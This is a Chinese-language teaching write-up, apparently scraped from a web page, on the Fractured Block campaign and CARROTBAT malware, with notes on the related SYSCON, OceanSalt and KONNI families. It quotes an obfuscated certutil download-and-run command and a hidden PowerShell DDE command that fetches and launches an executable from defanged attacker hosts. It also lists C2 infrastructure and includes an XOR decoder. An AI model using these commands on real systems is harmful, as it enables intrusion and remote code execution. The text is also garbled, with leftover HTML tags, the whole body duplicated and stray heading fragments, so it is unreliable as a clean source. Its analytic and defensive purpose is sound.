Fractured Block攻击活动与CARROTBAT恶意软件分析教学文档<\/h1>

1. 攻击活动概述<\/h2>
Fractured Block是一个针对东南亚地区（特别是韩国与朝鲜）的网络攻击活动，主要使用CARROTBAT恶意软件作为传播工具。<\/p>

1.1 关键时间线<\/h3>

首次发现<\/strong>：2017年12月（针对英国政府机构）<\/li>
活跃期<\/strong>：2018年3月至2018年9月（29个样本编译时间）<\/li>

最新活动<\/strong>：截至2018年11月仍在持续<\/li> <\/ul>
1.2 攻击目标<\/h3>

主要地区：韩国、朝鲜、英国、美国、加拿大<\/li>
目标行业：政府机构、加密货币交易所<\/li> <\/ul>
2. CARROTBAT恶意软件分析<\/h2>
2.1 基本功能<\/h3>
CARROTBAT是一个恶意代码传播软件，主要功能包括：<\/p>

嵌入并展示诱饵文件<\/li>
下载并执行远程payload<\/li>
支持11种文件格式的诱饵文档<\/li> <\/ul>
2.2 技术特点<\/h3>
2.2.1 文件结构<\/h4>

最后8个字节包含两个DWORD：

诱饵文档长度<\/li>
文件类型标识<\/li> <\/ul> <\/li>
剩余部分为完整的诱饵文档内容<\/li> <\/ul>
2.2.2 文件类型标识对应表<\/h4>

值<\/th> 文件扩展名<\/th> <\/tr> <\/thead>

0<\/td> .doc<\/td> <\/tr>
1<\/td> .docx<\/td> <\/tr>
2<\/td> .eml<\/td> <\/tr>
3<\/td> .hwp<\/td> <\/tr>
4<\/td> .jpg<\/td> <\/tr>
5<\/td> .pdf<\/td> <\/tr>
6<\/td> .png<\/td> <\/tr>
7<\/td> .ppt<\/td> <\/tr>
8<\/td> .pptx<\/td> <\/tr>
9<\/td> .xls<\/td> <\/tr>
10<\/td> .xlsx<\/td> <\/tr> <\/tbody> <\/table>
2.2.3 执行流程<\/h4>

读取自身最后8个字节获取诱饵信息<\/li>
提取诱饵文档并写入磁盘<\/li>
在新进程中打开诱饵文档<\/li>
执行混淆命令下载payload<\/li> <\/ol>
2.3 典型执行命令<\/h3>
C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f https:\/\/881.000webhostapp[.]com\/1.txt && ren 1.txt 1.bat && 1.bat && exit <\/code><\/pre> 3. 攻击手法分析<\/h2> 3.1 初始入侵方式<\/h3> 钓鱼邮件<\/strong>：伪装成政治或金融主题<\/li> 漏洞利用<\/strong>：使用DDE漏洞执行恶意代码<\/li> 示例攻击<\/strong>：主题："美国会在没有准备的情况下与朝鲜方面对话"<\/li> 利用代码： c:\windows\system32\cmd.exe "\/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https:\/\/881.000webhostapp[.]com\/0_31.doc', '%TEMP%\\AAA.exe');Start-Process('%TEMP%\\AAA.exe')<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ul> 3.2 诱饵主题<\/h3> 加密货币相关（如COINVIL交易所）<\/li> 政治事件（美朝关系、特朗普访问新加坡峰会）<\/li> <\/ul> 4. 关联恶意软件家族<\/h2> 4.1 SYSCON<\/h3> 类型：简单远程访问木马(RAT)<\/li> 通信方式：FTP<\/li> C2服务器示例： ftp.bytehost31[.]org<\/li> ftp.byethost7[.]com<\/li> ftp.byethost10[.]com<\/li> <\/ul> <\/li> <\/ul> 4.2 OceanSalt<\/h3> 特点：使用外部的winnet.ini存储C2信息<\/li> 信息使用XOR密钥编码<\/li> 典型C2：61.14.210[.]72:7117<\/li> <\/ul> <\/li> 解码函数示例（Python）： def<\/span> decode<\/span>(data): <\/span><\/span> out =<\/span> ""<\/span> <\/span><\/span> c =<\/span> 0<\/span> <\/span><\/span> for<\/span> d in<\/span> data: <\/span><\/span> out +=<\/span> chr(ord(d)^<\/span>c) <\/span><\/span> c+=<\/span>1<\/span> <\/span><\/span> return<\/span> out <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4.3 KONNI<\/h3> 类型：功能丰富的RAT<\/li> 活跃时间：4年以上<\/li> 目标地区：东南亚<\/li> <\/ul> 5. 基础设施分析<\/h2> 5.1 下载服务器<\/h3> https:\/\/881.000webhostapp[.]com\/1.txt<\/li> http:\/\/attach10132.1apps[.]com\/1.txt<\/li> https:\/\/071790.000webhostapp[.]com\/1.txt<\/li> https:\/\/vnik.000webhostapp[.]com\/1.txt<\/li> <\/ul> 5.2 C2服务器<\/h3> FTP服务器： ftp.byethost7[.]com<\/li> ftp.byethost10[.]com<\/li> files.000webhost[.]com<\/li> <\/ul> <\/li> OceanSalt C2： 61.14.210[.]72:7117<\/li> <\/ul> <\/li> <\/ul> 6. 防御措施<\/h2> 6.1 检测方法<\/h3> AutoFocus标签<\/strong>： FracturedBlock<\/li> SYSCON<\/li> KONNI<\/li> CARROTBAT<\/li> <\/ul> <\/li> WildFire<\/strong>：检测相关恶意文件<\/li> <\/ul> 6.2 防护建议<\/h3> 监控certutil工具的异常使用<\/li> 检查TEMP目录下的可疑.bat文件<\/li> 拦截与已知恶意域名的通信<\/li> 对Office文档启用DDE保护<\/li> <\/ol> 附录：样本哈希值<\/h2> CARROTBAT样本<\/h3> d34aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724d 8b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aa 26fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847 ... <\/code><\/pre> SYSCON样本<\/h3> 5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659 ... <\/code><\/pre> OceanSalt样本<\/h3> 59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005 7cf37067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8a472b6 ... <\/code><\/pre>

值<\/th>	文件扩展名<\/th> <\/tr> <\/thead>
0<\/td>	.doc<\/td> <\/tr>
1<\/td>	.docx<\/td> <\/tr>
2<\/td>	.eml<\/td> <\/tr>
3<\/td>	.hwp<\/td> <\/tr>
4<\/td>	.jpg<\/td> <\/tr>
5<\/td>	.pdf<\/td> <\/tr>
6<\/td>	.png<\/td> <\/tr>
7<\/td>	.ppt<\/td> <\/tr>
8<\/td>	.pptx<\/td> <\/tr>
9<\/td>	.xls<\/td> <\/tr>
10<\/td>	.xlsx<\/td> <\/tr> <\/tbody> <\/table> 2.2.3 执行流程<\/h4> 读取自身最后8个字节获取诱饵信息<\/li> 提取诱饵文档并写入磁盘<\/li> 在新进程中打开诱饵文档<\/li> 执行混淆命令下载payload<\/li> <\/ol> 2.3 典型执行命令<\/h3> C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f https:\/\/881.000webhostapp[.]com\/1.txt && ren 1.txt 1.bat && 1.bat && exit <\/code><\/pre> 3. 攻击手法分析<\/h2> 3.1 初始入侵方式<\/h3> 钓鱼邮件<\/strong>：伪装成政治或金融主题<\/li> 漏洞利用<\/strong>：使用DDE漏洞执行恶意代码<\/li> 示例攻击<\/strong>：主题："美国会在没有准备的情况下与朝鲜方面对话"<\/li> 利用代码： c:\windows\system32\cmd.exe "\/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https:\/\/881.000webhostapp[.]com\/0_31.doc', '%TEMP%\\AAA.exe');Start-Process('%TEMP%\\AAA.exe')<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ul> 3.2 诱饵主题<\/h3> 加密货币相关（如COINVIL交易所）<\/li> 政治事件（美朝关系、特朗普访问新加坡峰会）<\/li> <\/ul> 4. 关联恶意软件家族<\/h2> 4.1 SYSCON<\/h3> 类型：简单远程访问木马(RAT)<\/li> 通信方式：FTP<\/li> C2服务器示例： ftp.bytehost31[.]org<\/li> ftp.byethost7[.]com<\/li> ftp.byethost10[.]com<\/li> <\/ul> <\/li> <\/ul> 4.2 OceanSalt<\/h3> 特点：使用外部的winnet.ini存储C2信息<\/li> 信息使用XOR密钥编码<\/li> 典型C2：61.14.210[.]72:7117<\/li> <\/ul> <\/li> 解码函数示例（Python）： def<\/span> decode<\/span>(data): <\/span><\/span> out =<\/span> ""<\/span> <\/span><\/span> c =<\/span> 0<\/span> <\/span><\/span> for<\/span> d in<\/span> data: <\/span><\/span> out +=<\/span> chr(ord(d)^<\/span>c) <\/span><\/span> c+=<\/span>1<\/span> <\/span><\/span> return<\/span> out <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4.3 KONNI<\/h3> 类型：功能丰富的RAT<\/li> 活跃时间：4年以上<\/li> 目标地区：东南亚<\/li> <\/ul> 5. 基础设施分析<\/h2> 5.1 下载服务器<\/h3> https:\/\/881.000webhostapp[.]com\/1.txt<\/li> http:\/\/attach10132.1apps[.]com\/1.txt<\/li> https:\/\/071790.000webhostapp[.]com\/1.txt<\/li> https:\/\/vnik.000webhostapp[.]com\/1.txt<\/li> <\/ul> 5.2 C2服务器<\/h3> FTP服务器： ftp.byethost7[.]com<\/li> ftp.byethost10[.]com<\/li> files.000webhost[.]com<\/li> <\/ul> <\/li> OceanSalt C2： 61.14.210[.]72:7117<\/li> <\/ul> <\/li> <\/ul> 6. 防御措施<\/h2> 6.1 检测方法<\/h3> AutoFocus标签<\/strong>： FracturedBlock<\/li> SYSCON<\/li> KONNI<\/li> CARROTBAT<\/li> <\/ul> <\/li> WildFire<\/strong>：检测相关恶意文件<\/li> <\/ul> 6.2 防护建议<\/h3> 监控certutil工具的异常使用<\/li> 检查TEMP目录下的可疑.bat文件<\/li> 拦截与已知恶意域名的通信<\/li> 对Office文档启用DDE保护<\/li> <\/ol> 附录：样本哈希值<\/h2> CARROTBAT样本<\/h3> d34aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724d 8b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aa 26fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847 ... <\/code><\/pre> SYSCON样本<\/h3> 5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659 ... <\/code><\/pre> OceanSalt样本<\/h3> 59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005 7cf37067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8a472b6 ... <\/code><\/pre>

Fractured Block攻击活动与CARROTBAT恶意软件分析教学文档<\/h1>

1. 攻击活动概述<\/h2> Fractured Block是一个针对东南亚地区（特别是韩国与朝鲜）的网络攻击活动，主要使用CARROTBAT恶意软件作为传播工具。<\/p>

2. CARROTBAT恶意软件分析<\/h2>

2.2 技术特点<\/h3>

3. 攻击手法分析<\/h2>

4. 关联恶意软件家族<\/h2>

5. 基础设施分析<\/h2>

6. 防御措施<\/h2>

附录：样本哈希值<\/h2>

OceanSalt样本<\/h3> 59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005 7cf37067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8a472b6 ... <\/code><\/pre>

1. 攻击活动概述<\/h2>
Fractured Block是一个针对东南亚地区（特别是韩国与朝鲜）的网络攻击活动，主要使用CARROTBAT恶意软件作为传播工具。<\/p>

OceanSalt样本<\/h3>
`59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005 7cf37067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8a472b6 ... <\/code><\/pre>`